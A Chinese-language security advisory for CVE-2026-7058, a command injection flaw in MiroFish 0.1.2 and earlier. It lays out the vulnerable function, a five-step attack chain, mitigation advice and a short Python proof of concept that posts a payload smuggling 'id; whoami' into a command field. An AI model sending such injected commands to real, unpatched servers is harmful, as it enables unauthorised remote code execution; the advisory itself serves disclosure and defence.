CVE-2026-7058 CVSS 7.3 高危

CVE-2026-7058 MiroFish 命令注入漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7058

漏洞类型

命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

666ghj MiroFish

漏洞概述

666ghj MiroFish 软件在0.1.2及之前的版本中存在高危命令注入漏洞。该漏洞源于Inter-Process Communication组件中的`SimulationIPCClient.send_command`函数未能正确过滤用户输入。攻击者无需进行身份认证或用户交互，即可通过网络远程发起攻击。成功利用该漏洞可导致在服务器端执行任意系统命令，严重影响系统的机密性、完整性和可用性。目前厂商尚未发布修复补丁。

技术细节

该漏洞根植于666ghj MiroFish项目的后端核心组件，具体位于`backend/app/services/simulation_ipc.py`文件中的`SimulationIPCClient.send_command`函数。该函数主要用于处理应用程序与模拟环境之间的进程间通信（IPC）指令。由于开发者在编写代码时，直接将外部传入的数据拼接到系统命令字符串中，且未引入任何安全过滤机制（如转义特殊字符或使用白名单校验），导致了经典的命令注入漏洞。攻击者可以利用此缺陷，在无需认证的情况下，通过网络向受影响的服务端发送精心构造的恶意数据包。当服务器端的`send_command`方法处理该数据并调用底层Shell（如通过`os.system`或`subprocess.call`）执行时，攻击者注入的Shell元字符（如分号、管道符）将被解析为命令分隔符，从而导致任意系统命令的执行。这赋予了攻击者与Web服务进程相同的权限，可进一步控制服务器。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行666ghj MiroFish且版本低于或等于0.1.2的目标服务器。

STEP 2

武器化

攻击者构造包含Shell元字符（如 ; 或 |）的恶意命令字符串，旨在拼接并执行系统命令。

STEP 3

交付

攻击者向目标服务器的IPC接口发送带有恶意构造参数的HTTP POST请求。

STEP 4

利用

服务器后端`SimulationIPCClient.send_command`函数接收参数，直接拼接到系统命令中并执行Shell调用。

STEP 5

命令执行

注入的恶意命令在服务器端被Shell解析执行，攻击者成功获取服务器权限或敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target-ip:port/api/simulation/send_command"

# Malicious payload to execute 'id' and 'whoami'
payload = "normal_param; id; whoami"

# Data structure expected by the vulnerable function
data = {
    "command": payload
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

666ghj MiroFish <= 0.1.2

防御指南

临时缓解措施

在官方修复补丁发布前，建议禁用受影响的Inter-Process Communication组件或限制该服务的网络访问，以阻断远程攻击路径。同时，可在网络边界部署WAF规则，拦截包含常见命令注入特征符（如;|&）的流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7058
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7058
3 Details https://www.cvedetails.com/cve/CVE-2026-7058/
4 VulDB https://vuldb.com/cve/CVE-2026-7058
5 Link https://github.com/666ghj/MiroFish/
6 Link https://github.com/666ghj/MiroFish/issues/488
7 Link https://vuldb.com/submit/798603
8 Link https://vuldb.com/vuln/359631
9 Link https://vuldb.com/vuln/359631/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表